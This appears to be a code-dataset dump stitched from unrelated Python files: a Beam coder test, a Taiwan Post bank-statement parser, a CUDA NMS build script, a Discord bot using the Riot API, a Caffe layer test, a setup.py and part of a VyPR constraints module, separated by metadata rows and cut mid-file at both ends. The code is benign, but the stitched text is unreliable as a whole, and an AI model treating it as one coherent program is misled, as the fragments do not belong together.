self.check_coder(coders._TimerCoder(coders.BytesCoder()),
*[{'timestamp': timestamp.Timestamp(micros=x),
'payload': b'xyz'}
for x in (-3000, 0, 3000)])
self.check_coder(
coders.TupleCoder((coders._TimerCoder(coders.VarIntCoder()),)),
({'timestamp': timestamp.Timestamp.of(37000), 'payload': 389},))
def test_tuple_coder(self):
kv_coder = coders.TupleCoder((coders.VarIntCoder(), coders.BytesCoder()))
# Verify cloud object representation
self.assertEqual(
{
'@type': 'kind:pair',
'is_pair_like': True,
'component_encodings': [
coders.VarIntCoder().as_cloud_object(),
coders.BytesCoder().as_cloud_object()],
},
kv_coder.as_cloud_object())
# Test binary representation
self.assertEqual(
b'\x04abc',
kv_coder.encode((4, b'abc')))
# Test unnested
self.check_coder(
kv_coder,
(1, b'a'),
(-2, b'a' * 100),
(300, b'abc\0' * 5))
# Test nested
self.check_coder(
coders.TupleCoder(
(coders.TupleCoder((coders.PickleCoder(), coders.VarIntCoder())),
coders.StrUtf8Coder())),
((1, 2), 'a'),
((-2, 5), u'a\u0101' * 100),
((300, 1), 'abc\0' * 5))
def test_tuple_sequence_coder(self):
int_tuple_coder = coders.TupleSequenceCoder(coders.VarIntCoder())
self.check_coder(int_tuple_coder, (1, -1, 0), (), tuple(range(1000)))
self.check_coder(
coders.TupleCoder((coders.VarIntCoder(), int_tuple_coder)),
(1, (1, 2, 3)))
def test_base64_pickle_coder(self):
self.check_coder(coders.Base64PickleCoder(), 'a', 1, 1.5, (1, 2, 3))
def test_utf8_coder(self):
self.check_coder(coders.StrUtf8Coder(), 'a', u'ab\u00FF', u'\u0101\0')
def test_iterable_coder(self):
iterable_coder = coders.IterableCoder(coders.VarIntCoder())
# Verify cloud object representation
self.assertEqual(
{
'@type': 'kind:stream',
'is_stream_like': True,
'component_encodings': [coders.VarIntCoder().as_cloud_object()]
},
iterable_coder.as_cloud_object())
# Test unnested
self.check_coder(iterable_coder,
[1], [-1, 0, 100])
# Test nested
self.check_coder(
coders.TupleCoder((coders.VarIntCoder(),
coders.IterableCoder(coders.VarIntCoder()))),
(1, [1, 2, 3]))
def test_iterable_coder_unknown_length(self):
# Empty
self._test_iterable_coder_of_unknown_length(0)
# Single element
self._test_iterable_coder_of_unknown_length(1)
# Multiple elements
self._test_iterable_coder_of_unknown_length(100)
# Multiple elements with underlying stream buffer overflow.
self._test_iterable_coder_of_unknown_length(80000)
def _test_iterable_coder_of_unknown_length(self, count):
def iter_generator(count):
for i in range(count):
yield i
iterable_coder = coders.IterableCoder(coders.VarIntCoder())
self.assertCountEqual(list(iter_generator(count)),
iterable_coder.decode(
iterable_coder.encode(iter_generator(count))))
def test_windowedvalue_coder_paneinfo(self):
coder = coders.WindowedValueCoder(coders.VarIntCoder(),
coders.GlobalWindowCoder())
test_paneinfo_values = [
windowed_value.PANE_INFO_UNKNOWN,
windowed_value.PaneInfo(
True, True, windowed_value.PaneInfoTiming.EARLY, 0, -1),
windowed_value.PaneInfo(
True, False, windowed_value.PaneInfoTiming.ON_TIME, 0, 0),
windowed_value.PaneInfo(
True, False, windowed_value.PaneInfoTiming.ON_TIME, 10, 0),
windowed_value.PaneInfo(
False, True, windowed_value.PaneInfoTiming.ON_TIME, 0, 23),
windowed_value.PaneInfo(
False, True, windowed_value.PaneInfoTiming.ON_TIME, 12, 23),
windowed_value.PaneInfo(
False, False, windowed_value.PaneInfoTiming.LATE, 0, 123),]
test_values = [windowed_value.WindowedValue(123, 234, (GlobalWindow(),), p)
for p in test_paneinfo_values]
# Test unnested.
self.check_coder(coder, windowed_value.WindowedValue(
123, 234, (GlobalWindow(),), windowed_value.PANE_INFO_UNKNOWN))
for value in test_values:
self.check_coder(coder, value)
# Test nested.
for value1 in test_values:
for value2 in test_values:
self.check_coder(coders.TupleCoder((coder, coder)), (value1, value2))
def test_windowed_value_coder(self):
coder = coders.WindowedValueCoder(coders.VarIntCoder(),
coders.GlobalWindowCoder())
# Verify cloud object representation
self.assertEqual(
{
'@type': 'kind:windowed_value',
'is_wrapper': True,
'component_encodings': [
coders.VarIntCoder().as_cloud_object(),
coders.GlobalWindowCoder().as_cloud_object(),
],
},
coder.as_cloud_object())
# Test binary representation
self.assertEqual(b'\x7f\xdf;dZ\x1c\xac\t\x00\x00\x00\x01\x0f\x01',
coder.encode(window.GlobalWindows.windowed_value(1)))
# Test decoding large timestamp
self.assertEqual(
coder.decode(b'\x7f\xdf;dZ\x1c\xac\x08\x00\x00\x00\x01\x0f\x00'),
windowed_value.create(0, MIN_TIMESTAMP.micros, (GlobalWindow(),)))
# Test unnested
self.check_coder(
coders.WindowedValueCoder(coders.VarIntCoder()),
windowed_value.WindowedValue(3, -100, ()),
windowed_value.WindowedValue(-1, 100, (1, 2, 3)))
# Test Global Window
self.check_coder(
coders.WindowedValueCoder(coders.VarIntCoder(),
coders.GlobalWindowCoder()),
window.GlobalWindows.windowed_value(1))
# Test nested
self.check_coder(
coders.TupleCoder((
coders.WindowedValueCoder(coders.FloatCoder()),
coders.WindowedValueCoder(coders.StrUtf8Coder()))),
(windowed_value.WindowedValue(1.5, 0, ()),
windowed_value.WindowedValue("abc", 10, ('window',))))
def test_proto_coder(self):
# For instructions on how these test proto message were generated,
# see coders_test.py
ma = test_message.MessageA()
mab = ma.field2.add()
mab.field1 = True
ma.field1 = u'hello world'
mb = test_message.MessageA()
mb.field1 = u'beam'
proto_coder = coders.ProtoCoder(ma.__class__)
self.check_coder(proto_coder, ma)
self.check_coder(coders.TupleCoder((proto_coder, coders.BytesCoder())),
(ma, b'a'), (mb, b'b'))
def test_global_window_coder(self):
coder = coders.GlobalWindowCoder()
value = window.GlobalWindow()
# Verify cloud object representation
self.assertEqual({'@type': 'kind:global_window'},
coder.as_cloud_object())
# Test binary representation
self.assertEqual(b'', coder.encode(value))
self.assertEqual(value, coder.decode(b''))
# Test unnested
self.check_coder(coder, value)
# Test nested
self.check_coder(coders.TupleCoder((coder, coder)),
(value, value))
def test_length_prefix_coder(self):
coder = coders.LengthPrefixCoder(coders.BytesCoder())
# Verify cloud object representation
self.assertEqual(
{
'@type': 'kind:length_prefix',
'component_encodings': [coders.BytesCoder().as_cloud_object()]
},
coder.as_cloud_object())
# Test binary representation
self.assertEqual(b'\x00', coder.encode(b''))
self.assertEqual(b'\x01a', coder.encode(b'a'))
self.assertEqual(b'\x02bc', coder.encode(b'bc'))
self.assertEqual(b'\xff\x7f' + b'z' * 16383, coder.encode(b'z' * 16383))
# Test unnested
self.check_coder(coder, b'', b'a', b'bc', b'def')
# Test nested
self.check_coder(coders.TupleCoder((coder, coder)),
(b'', b'a'),
(b'bc', b'def'))
def test_nested_observables(self):
class FakeObservableIterator(observable.ObservableMixin):
def __iter__(self):
return iter([1, 2, 3])
# Coder for elements from the observable iterator.
elem_coder = coders.VarIntCoder()
iter_coder = coders.TupleSequenceCoder(elem_coder)
# Test nested WindowedValue observable.
coder = coders.WindowedValueCoder(iter_coder)
observ = FakeObservableIterator()
value = windowed_value.WindowedValue(observ, 0, ())
self.assertEqual(
coder.get_impl().get_estimated_size_and_observables(value)[1],
[(observ, elem_coder.get_impl())])
# Test nested tuple observable.
coder = coders.TupleCoder((coders.StrUtf8Coder(), iter_coder))
value = (u'123', observ)
self.assertEqual(
coder.get_impl().get_estimated_size_and_observables(value)[1],
[(observ, elem_coder.get_impl())])
def test_state_backed_iterable_coder(self):
# pylint: disable=global-variable-undefined
# required for pickling by reference
global state
state = {}
def iterable_state_write(values, element_coder_impl):
token = b'state_token_%d' % len(state)
state[token] = [element_coder_impl.encode(e) for e in values]
return token
def iterable_state_read(token, element_coder_impl):
return [element_coder_impl.decode(s) for s in state[token]]
coder = coders.StateBackedIterableCoder(
coders.VarIntCoder(),
read_state=iterable_state_read,
write_state=iterable_state_write,
write_state_threshold=1)
context = pipeline_context.PipelineContext(
iterable_state_read=iterable_state_read,
iterable_state_write=iterable_state_write)
self.check_coder(
coder, [1, 2, 3], context=context, test_size_estimation=False)
# Ensure that state was actually used.
self.assertNotEqual(state, {})
self.check_coder(coders.TupleCoder((coder, coder)),
([1], [2, 3]),
context=context,
test_size_estimation=False)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
| 37.815574
| 80
| 0.647231
|
0d0034660c9ff9a2a0fbc2ade1e8e796b7ed5175
| 2,592
|
py
|
Python
|
cinderella/parsers/post.py
|
benkajaja/Cinderella
|
64bf42e69583192ffa716a0e67c54c945aa5f6de
|
[
"Apache-2.0"
] | null | null | null |
cinderella/parsers/post.py
|
benkajaja/Cinderella
|
64bf42e69583192ffa716a0e67c54c945aa5f6de
|
[
"Apache-2.0"
] | null | null | null |
cinderella/parsers/post.py
|
benkajaja/Cinderella
|
64bf42e69583192ffa716a0e67c54c945aa5f6de
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
from datetime import datetime
from decimal import Decimal
from cinderella.datatypes import Transactions, StatementCategory
from cinderella.parsers.base import StatementParser
class TaiwanPost(StatementParser):
identifier = "post"
def __init__(self):
super().__init__()
self.default_source_accounts = {StatementCategory.bank: "Assets:Bank:Post"}
def _read_statement(self, filepath: str) -> pd.DataFrame:
df = pd.read_csv(
filepath, skipfooter=2, skiprows=1, thousands=",", engine="python"
)
df = df.replace({"=": "", '"': ""}, regex=True)
return df
def _parse_bank_statement(self, records: pd.DataFrame) -> Transactions:
category = StatementCategory.bank
transactions = Transactions(category, self.identifier)
prev_transaction = None
for _, record in records.iterrows():
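            # record[0] holds a date in the Taiwanese (ROC) calendar; the year is
            # converted to the common era by adding 1911 (e.g. year 110 becomes 2021)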
date_tw = str(record[0])
date_to_ce = date_tw.replace(date_tw[0:3], str(int(date_tw[0:3]) + 1911))
date = datetime.strptime(date_to_ce, "%Y/%m/%d %H:%M:%S")
title = record[1]
if not pd.isna(record[3]):
price = -Decimal(record[3])
elif not pd.isna(record[4]):
price = Decimal(record[4])
else:
raise RuntimeError(
f"Can not parse {self.identifier} {category.name} statement {record}"
)
currency = "TWD"
account = self.default_source_accounts[category]
if (
prev_transaction and date == prev_transaction.date and price == 0
): # duplicated record
transaction = prev_transaction
self.beancount_api.add_transaction_comment(
transaction, f"{title}-{price}"
)
else:
transaction = self.beancount_api.make_transaction(
date, title, account, price, currency
)
transactions.append(transaction)
if str(record[6]).strip():
self.beancount_api.add_transaction_comment(transaction, str(record[6]))
if record[7]:
self.beancount_api.add_transaction_comment(transaction, str(record[7]))
prev_transaction = transaction
return transactions
def _parse_card_statement(self, records: list) -> Transactions:
raise NotImplementedError
def _parse_stock_statement(self, records: list) -> Transactions:
raise NotImplementedError
| 36.507042
| 89
| 0.596451
|
23eb25b1d1dcca9122e3d933482f6078cc50832a
| 5,276
|
py
|
Python
|
lib/nms/setup_linux.py
|
ZucchiniTang/Deformable-ConvNets
|
e91c3aee8284abefbe87007d41fa0c801e179bd5
|
[
"MIT"
] | null | null | null |
lib/nms/setup_linux.py
|
ZucchiniTang/Deformable-ConvNets
|
e91c3aee8284abefbe87007d41fa0c801e179bd5
|
[
"MIT"
] | null | null | null |
lib/nms/setup_linux.py
|
ZucchiniTang/Deformable-ConvNets
|
e91c3aee8284abefbe87007d41fa0c801e179bd5
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------
# Deformable Convolutional Networks
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Modified from py-faster-rcnn (https://github.com/rbgirshick/py-faster-rcnn)
# --------------------------------------------------------
import os
from os.path import join as pjoin
from setuptools import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import numpy as np
def find_in_path(name, path):
"Find a file in a search path"
    # Adapted from
# http://code.activestate.com/recipes/52224-find-a-file-given-a-search-path/
for dir in path.split(os.pathsep):
binpath = pjoin(dir, name)
if os.path.exists(binpath):
return os.path.abspath(binpath)
return None
def locate_cuda():
"""Locate the CUDA environment on the system
Returns a dict with keys 'home', 'nvcc', 'include', and 'lib64'
and values giving the absolute path to each directory.
Starts by looking for the CUDAHOME env variable. If not found, everything
is based on finding 'nvcc' in the PATH.
"""
# first check if the CUDAHOME env variable is in use
if 'CUDAHOME' in os.environ:
print("cudahome")
home = os.environ['CUDAHOME']
nvcc = pjoin(home, 'bin', 'nvcc')
else:
# otherwise, search the PATH for NVCC
default_path = pjoin(os.sep, 'usr', 'local', 'cuda', 'bin')
nvcc = find_in_path('nvcc', os.environ['PATH'] + os.pathsep + default_path)
if nvcc is None:
raise EnvironmentError('The nvcc binary could not be '
'located in your $PATH. Either add it to your path, or set $CUDAHOME')
home = os.path.dirname(os.path.dirname(nvcc))
print(home, nvcc)
cudaconfig = {'home':home, 'nvcc':nvcc,
'include': pjoin(home, 'include'),
'lib64': pjoin(home, 'lib64')}
    for k, v in cudaconfig.items():
if not os.path.exists(v):
raise EnvironmentError('The CUDA %s path could not be located in %s' % (k, v))
return cudaconfig
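# For illustration (hypothetical install path): with CUDAHOME=/usr/local/cuda, locate_cuda()
# would return {'home': '/usr/local/cuda', 'nvcc': '/usr/local/cuda/bin/nvcc',
#               'include': '/usr/local/cuda/include', 'lib64': '/usr/local/cuda/lib64'}.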
CUDA = locate_cuda()
# Obtain the numpy include directory. This logic works across numpy versions.
try:
numpy_include = np.get_include()
except AttributeError:
numpy_include = np.get_numpy_include()
def customize_compiler_for_nvcc(self):
"""inject deep into distutils to customize how the dispatch
to gcc/nvcc works.
If you subclass UnixCCompiler, it's not trivial to get your subclass
injected in, and still have the right customizations (i.e.
distutils.sysconfig.customize_compiler) run on it. So instead of going
    the OO route, I have this. Note, it's kind of like a weird functional
subclassing going on."""
    # tell the compiler it can process .cu
self.src_extensions.append('.cu')
    # save references to the default compiler_so and _compile methods
default_compiler_so = self.compiler_so
super = self._compile
# now redefine the _compile method. This gets executed for each
# object but distutils doesn't have the ability to change compilers
# based on source extension: we add it.
def _compile(obj, src, ext, cc_args, extra_postargs, pp_opts):
if os.path.splitext(src)[1] == '.cu':
# use the cuda for .cu files
self.set_executable('compiler_so', CUDA['nvcc'])
# use only a subset of the extra_postargs, which are 1-1 translated
# from the extra_compile_args in the Extension class
postargs = extra_postargs['nvcc']
else:
postargs = extra_postargs['gcc']
super(obj, src, ext, cc_args, postargs, pp_opts)
# reset the default compiler_so, which we might have changed for cuda
self.compiler_so = default_compiler_so
# inject our redefined _compile method into the class
self._compile = _compile
# run the customize_compiler
class custom_build_ext(build_ext):
def build_extensions(self):
customize_compiler_for_nvcc(self.compiler)
build_ext.build_extensions(self)
ext_modules = [
Extension(
"cpu_nms",
["cpu_nms.pyx"],
extra_compile_args={'gcc': ["-Wno-cpp", "-Wno-unused-function"]},
include_dirs = [numpy_include]
),
Extension('gpu_nms',
['nms_kernel.cu', 'gpu_nms.pyx'],
library_dirs=[CUDA['lib64']],
libraries=['cudart'],
language='c++',
runtime_library_dirs=[CUDA['lib64']],
# this syntax is specific to this build system
# we're only going to use certain compiler args with nvcc and not with
        # gcc; the implementation of this trick is in customize_compiler_for_nvcc() above
extra_compile_args={'gcc': ["-Wno-unused-function"],
'nvcc': ['-arch=sm_35',
'--ptxas-options=-v',
'-c',
'--compiler-options',
"'-fPIC'"]},
include_dirs = [numpy_include, CUDA['include']]
),
]
setup(
name='nms',
ext_modules=ext_modules,
# inject our custom trigger
cmdclass={'build_ext': custom_build_ext},
)
| 36.895105
| 90
| 0.625284
|
a2c9fa875fc1b309f173e2162ae7985e5f2f42c7
| 2,939
|
py
|
Python
|
bot.py
|
blbudima/tilt-bot
|
9b0e15724216bc03c7ddc2b2313382c8f733fd47
|
[
"MIT"
] | null | null | null |
bot.py
|
blbudima/tilt-bot
|
9b0e15724216bc03c7ddc2b2313382c8f733fd47
|
[
"MIT"
] | null | null | null |
bot.py
|
blbudima/tilt-bot
|
9b0e15724216bc03c7ddc2b2313382c8f733fd47
|
[
"MIT"
] | null | null | null |
# DON'T FORGET TO ENABLE THE VIRTUAL ENVIRONMENT VIA:
# .\bot-env\Scripts\activate.bat
# DON'T FORGET TO RESET RIOT API TOKEN
# https://developer.riotgames.com/
# SET THE TOKEN AS AN ENVIRONMENT VARIABLE NAMED "RIOT_API_KEY"
# ON WINDOWS, RUN BOT THROUGH POWERSHELL VIA: py -3 bot.py
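# A minimal sketch of what config.py is assumed to provide (the actual file is not shown
# here); only the names referenced below matter:
#   import os
#   riot_api_key = os.environ.get("RIOT_API_KEY")
#   token = "<discord bot token>"
#   prefix = "!"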
import discord
import config
import cassiopeia
from cassiopeia import Summoner, Patch
# set riot api key
cassiopeia.set_riot_api_key(config.riot_api_key)
# create new Discord client
client = discord.Client()
# on ready, say ready
@client.event
async def on_ready():
print('Ready as {0.user}'.format(client))
@client.event
async def on_message(message):
# ignore message from itself
if message.author == client.user:
return
# extract content
args = message.content.split()
# check for search command
if args[0] == config.prefix + 'search':
# if there is no username, return
if (len(args) == 1):
return await message.channel.send('Incorrect usage! You need to supply a username as well!')
# prepare name
spaces = ' '
args.pop(0)
username = spaces.join(args)
# just for console
print('The extracted username is: ' + username)
# send notice
await message.channel.send('Let me check...')
# create summoner object
print('Attempting to create summoner object (Region NA)..')
summoner_name = Summoner(name=username, region="NA")
# attempt to look up match history
print('Attempting to look up match history...')
try:
match_hist = summoner_name.match_history(begin_time=Patch.from_str("10.7", region="NA").start)
except Exception as e:
print(e)
return await message.channel.send('That username does not exist!')
# check if you are looking for a win streak or a loss streak
looking_for_win = False
if (match_hist[0].participants[summoner_name].team.win is True):
looking_for_win = True
# count match streak
match_counter = 1
while (True):
next_turnout = match_hist[match_counter].participants[summoner_name].team.win
if (looking_for_win and not next_turnout) or (not looking_for_win and next_turnout):
break
match_counter += 1
# print results
print('Printing out result for ' + username)
if looking_for_win:
return await message.channel.send(username + ' is on a ' + str(match_counter) + ' game winning streak.')
else:
return await message.channel.send(username + ' is on a ' + str(match_counter) + ' game losing streak.')
# if user supplied help command, show search
if args[0] == config.prefix + 'help':
return await message.channel.send('The proper command is `' + config.prefix + 'search <username>`.')
# if user supplied invalid command, show search
if args[0][0:2] == config.prefix:
return await message.channel.send('Invalid usage! Do `' + config.prefix + 'search <username>`.')
# login with the client
client.run(config.token)
| 31.602151
| 110
| 0.695475
|
d1f0c2a30f76dccb8376ef866e6e2746a6fd0fb0
| 2,558
|
py
|
Python
|
caffe/python/caffe/test/test_adaptive_weighting_loss_layer.py
|
gvvynplaine/training_toolbox_caffe
|
789ff8ddf6031802e51e45f6ad80c549079dc9df
|
[
"Apache-2.0"
] | 3
|
2021-07-21T10:39:48.000Z
|
2021-09-21T20:49:07.000Z
|
caffe/python/caffe/test/test_adaptive_weighting_loss_layer.py
|
gvvynplaine/training_toolbox_caffe
|
789ff8ddf6031802e51e45f6ad80c549079dc9df
|
[
"Apache-2.0"
] | null | null | null |
caffe/python/caffe/test/test_adaptive_weighting_loss_layer.py
|
gvvynplaine/training_toolbox_caffe
|
789ff8ddf6031802e51e45f6ad80c549079dc9df
|
[
"Apache-2.0"
] | 2
|
2020-12-07T03:16:05.000Z
|
2021-03-23T00:57:15.000Z
|
# pylint: skip-file
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tempfile
import unittest
import caffe
import numpy as np
def python_net_file():
with tempfile.NamedTemporaryFile(mode='w+', delete=False) as f:
f.write("""name: 'adaptive_weighting_loss_layer_test_net'
force_backward: true
layer { name: "input1" type: "Input" top: "input1"
input_param { shape { dim: 1 } } }
layer { name: "input2" type: "Input" top: "input2"
input_param { shape { dim: 1 } } }
layer { name: "input3" type: "Input" top: "input3"
input_param { shape { dim: 1 } } }
layer { type: 'Python' name: 'adaptive_loss'
bottom: 'input1' bottom: 'input2' bottom: 'input3'
top: 'adaptive_loss_value'
python_param { module: 'caffe.custom_layers.adaptive_weighting_loss_layer'
layer: 'AdaptiveWeightingLossLayer'
param_str: '{ "scale": 1.0, "init": 0.0}' } }""")
return f.name
@unittest.skipIf('Python' not in caffe.layer_type_list(), 'Caffe built without Python layer support')
class TestScheduleScaleLayer(unittest.TestCase):
def setUp(self):
net_file = python_net_file()
self.net = caffe.Net(net_file, caffe.TRAIN)
os.remove(net_file)
def test_forward(self):
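        # with init 0.0 in the layer's param_str above, the expected loss reduces to the
        # plain sum of the three inputs, hence target_value below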
data = np.random.uniform(0.5, 15.0, size=3)
target_value = np.sum(data)
self.net.blobs['input1'].data[...] = data[0]
self.net.blobs['input2'].data[...] = data[1]
self.net.blobs['input3'].data[...] = data[2]
net_outputs = self.net.forward()
predicted_value = net_outputs['adaptive_loss_value']
self.assertEqual(len(predicted_value), 1)
self.assertAlmostEqual(predicted_value[0], target_value, places=5)
| 39.96875
| 101
| 0.605942
|
11c298662f8c621d5ab79b85c56500d0bebafd62
| 546
|
py
|
Python
|
setup.py
|
knavsaria/dynodoc
|
f0594990b447022ab8ba8c0d305f7ea982708860
|
[
"MIT"
] | null | null | null |
setup.py
|
knavsaria/dynodoc
|
f0594990b447022ab8ba8c0d305f7ea982708860
|
[
"MIT"
] | null | null | null |
setup.py
|
knavsaria/dynodoc
|
f0594990b447022ab8ba8c0d305f7ea982708860
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
setup (
name="dynodoc",
version="0.1",
description='DynamoDB CLI tool that uses the document interface',
url='http://github.com/knavsaria/dynodoc',
download_url='https://github.com/knavsaria/dynodoc/archive/0.1.tar.gz',
author='Keeran Navsaria',
author_email='keeran.navsaria@gmail.com',
packages=find_packages(),
install_requires=[
"Click",
"boto3"
],
entry_points='''
[console_scripts]
dynodoc=dynodoc.dynodoc:cli
'''
)
| 27.3
| 75
| 0.653846
|
8ed566be899f197058bf112a94e07e9853974bbf
| 40,989
|
py
|
Python
|
VyPR/Specifications/constraints.py
|
SNTSVV/VyPR-iCFTL
|
8e6b170821fb4dc1278094d2ed270e5fd619c193
|
[
"Apache-2.0"
] | null | null | null |
VyPR/Specifications/constraints.py
|
SNTSVV/VyPR-iCFTL
|
8e6b170821fb4dc1278094d2ed270e5fd619c193
|
[
"Apache-2.0"
] | null | null | null |
VyPR/Specifications/constraints.py
|
SNTSVV/VyPR-iCFTL
|
8e6b170821fb4dc1278094d2ed270e5fd619c193
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright (C) 2021 University of Luxembourg
Developed by Dr. Joshua Heneage Dawes.
Module containing classes to represent constraints used in an iCFTL specification.
For example, in the specification
forall q in changes(x) : q(x) < 10
q(x) < 10 is a constraint and is represented using the classes in this module.
"""
from VyPR.Specifications.predicates import changes, calls
import VyPR.Logging.logger as logger
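# Illustrative sketch (assuming a quantifier has bound q as a ConcreteStateVariable): the
# constraint q(x) < 10 from the docstring above would be built as
#   ConcreteStateVariable("q")("x") < 10
# where the call yields a ValueInConcreteState object and the comparison yields a
# ValueInConcreteStateLessThanConstant atomic constraint.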
def _is_constraint_base(obj):
"""
Decide whether obj has ConstraintBase as a base class.
"""
return ConstraintBase in type(obj).__bases__
def _is_connective(obj):
"""
Decide whether obj is a logical connective (and, or, not).
"""
return type(obj) in [Conjunction, Disjunction, Negation]
def is_complete(obj):
"""
Decide whether obj is complete, or needs to be completed by further method calls.
"""
return _is_connective(obj) or _is_constraint_base(obj)
def is_normal_atom(obj):
"""
Decide whether an atomic constraint is normal (it requires only one measurement).
"""
return NormalAtom in type(obj).__bases__
def is_mixed_atom(obj):
"""
Decide whether an atomic constraint is mixed (it requires multiple measurements).
"""
return MixedAtom in type(obj).__bases__
def derive_sequence_of_temporal_operators(obj) -> dict:
"""
Traverse the structure of the given atomic constraint in order to determine the sequence
of temporal operators used.
"""
# initialise map from subatom index to sequence of temporal operators
# check whether the atomic constraint given is normal or mixed
if is_normal_atom(obj):
# normal atomic constraint case
return {
0: _derive_sequence_of_temporal_operators(obj)
}
else:
# mixed atomic constraint case
return {
0: _derive_sequence_of_temporal_operators(obj.get_lhs_expression()),
1: _derive_sequence_of_temporal_operators(obj.get_rhs_expression())
}
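# For example (illustrative): for the normal atom q.next(calls(...)).duration() < 5, the
# helper below walks back from the comparison through DurationOfTransition and the
# NextTransitionFromConcreteState operator to the base variable q, so the result is
#   {0: [<NextTransitionFromConcreteState>, q]}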
def _derive_sequence_of_temporal_operators(obj) -> list:
"""
Traverse the structure of the given atomic constraint. This function is called by
derive_sequence_of_temporal_operators in order to generate either 1 or 2 sequences
of temporal operators (1 for normal case, 2 for mixed case).
"""
# initialise empty sequence of temporal operators
temporal_operator_sequence = []
# initialise the current object to be used during the traversal
current_obj = obj
# traverse the structure of current_obj until we reach a variable
while type(current_obj) not in [ConcreteStateVariable, TransitionVariable]:
# check the type of current_obj
# we only add to the temporal operator sequence in certain cases,
# for example when a Next... class is found
if type(current_obj) in [ValueInConcreteStateEqualsConstant,
ValueInConcreteStateLessThanConstant,
ValueInConcreteStateGreaterThanConstant,
ValueLengthInConcreteStateEqualsConstant,
ValueLengthInConcreteStateGreaterThanConstant,
ValueLengthInConcreteStateLessThanConstant,
ValueLengthInConcreteStateEqualsTransitionDuration,
ValueLengthInConcreteStateGreaterThanTransitionDuration,
ValueLengthInConcreteStateLessThanTransitionDuration]:
current_obj = current_obj.get_value_expression()
elif type(current_obj) in [DurationOfTransitionLessThanConstant,
DurationOfTransitionGreaterThanConstant]:
current_obj = current_obj.get_transition_duration_obj()
elif type(current_obj) is ValueInConcreteState:
current_obj = current_obj.get_concrete_state_expression()
elif type(current_obj) is ValueLengthInConcreteState:
current_obj = current_obj.get_value_expression()
elif type(current_obj) is DurationOfTransition:
current_obj = current_obj.get_transition_expression()
elif type(current_obj) in [ConcreteStateBeforeTransition, ConcreteStateAfterTransition]:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_transition_expression()
elif type(current_obj) is NextTransitionFromConcreteState:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_concrete_state_expression()
elif type(current_obj) is NextConcreteStateFromConcreteState:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_concrete_state_expression()
elif type(current_obj) is NextTransitionFromTransition:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_transition_expression()
elif type(current_obj) is NextConcreteStateFromTransition:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_transition_expression()
# add the variable to the end of the sequence
temporal_operator_sequence.append(current_obj)
return temporal_operator_sequence
def get_base_variable(obj) -> list:
"""
Get the temporal operator sequence of obj and return the last element (the base variable)
Note: we assume that the object given does not have multiple base variables, hence
in the case of a mixed atom, the object given should be a part of the atomic constraint (and not the atomic constraint
itself).
"""
return _derive_sequence_of_temporal_operators(obj)[-1]
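# Continuing the illustration above: the base variable of q.next(calls(...)).duration() < 5 is q.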
class Constraint():
"""
Class for representing the recursive structure of the quantifier-free part of iCFTL specifications.
"""
def __init__(self, specification_obj, constraint):
self._specification_obj = specification_obj
self._constraint = constraint
def __repr__(self):
executed_lambda = self.instantiate()
if ConstraintBase not in type(executed_lambda).__bases__:
# TODO: indicate which part of the constraint is not complete
logger.log.info("Constraint given in specification is not complete:")
logger.log.info(str(executed_lambda))
raise Exception("Constraint given in specification is not complete.")
return str(executed_lambda)
def instantiate(self):
"""
Determine the set of variables from quantifiers and instantiate the quantifier-free
part of the specification.
"""
arguments = self._specification_obj.get_variable_to_obj_map()
executed_lambda = self._constraint(**arguments)
return executed_lambda
def get_atomic_constraints(self):
"""
Traverse the specification in order to get a list of the atomic constraints used.
"""
# initialise an empty list of all atomic constraints
all_atomic_constraints = []
        # initialise stack with the top-level Constraint object for traversal
stack = [self]
# process the stack while it is not empty
while len(stack) > 0:
# get the top element from the stack
top = stack.pop()
# based on the type, add child elements to the stack
if type(top) is Constraint:
stack.append(top.instantiate())
elif type(top) is Conjunction:
stack += top.get_conjuncts()
elif type(top) is Disjunction:
stack += top.get_disjuncts()
elif type(top) is Negation:
stack.append(top.get_operand())
elif _is_constraint_base(top):
all_atomic_constraints.append(top)
return all_atomic_constraints
class ConstraintBase():
"""
Class for representing the root of a combination of constraints.
"""
pass
class NormalAtom():
"""
Class representing an atomic constraint for which a single measurement must be taken.
"""
pass
class MixedAtom():
"""
Class representing an atomic constraint for which multiple measurements must be taken.
"""
pass
"""
Propositional connectives.
"""
class Conjunction(ConstraintBase):
"""
Class to represent a conjunction of 2 or more constraints.
"""
def __init__(self, *conjuncts):
# check that each conjunct is complete
for conjunct in conjuncts:
if not is_complete(conjunct):
raise Exception(f"Conjunct {conjunct} is not complete")
# we cast to a list so that conjuncts can be replaced during formula tree updates
self._conjuncts = list(conjuncts)
def __repr__(self):
serialised_conjuncts = map(str, self._conjuncts)
return " and ".join(serialised_conjuncts)
def get_conjuncts(self) -> list:
return self._conjuncts
class Disjunction(ConstraintBase):
"""
Class to represent a disjunction of 2 or more constraints.
"""
def __init__(self, *disjuncts):
# check that each disjunct is complete
for disjunct in disjuncts:
if not is_complete(disjunct):
raise Exception(f"Disjunct {disjunct} is not complete")
        # we cast to a list so that disjuncts can be replaced during formula tree updates
self._disjuncts = list(disjuncts)
def __repr__(self):
serialised_disjuncts = map(str, self._disjuncts)
return " or ".join(serialised_disjuncts)
def get_disjuncts(self) -> list:
return self._disjuncts
class Negation(ConstraintBase):
"""
Class to represent the negation.
Negation should be propagated through to atomic constraints.
"""
def __init__(self, operand):
# check that operand is complete
if not is_complete(operand):
raise Exception(f"Operand {operand} for negation is not complete")
self.operand = operand
def __repr__(self):
return f"not( {self.operand} )"
def get_operand(self):
return self.operand
"""
Types of expressions.
"""
class ConcreteStateExpression():
"""
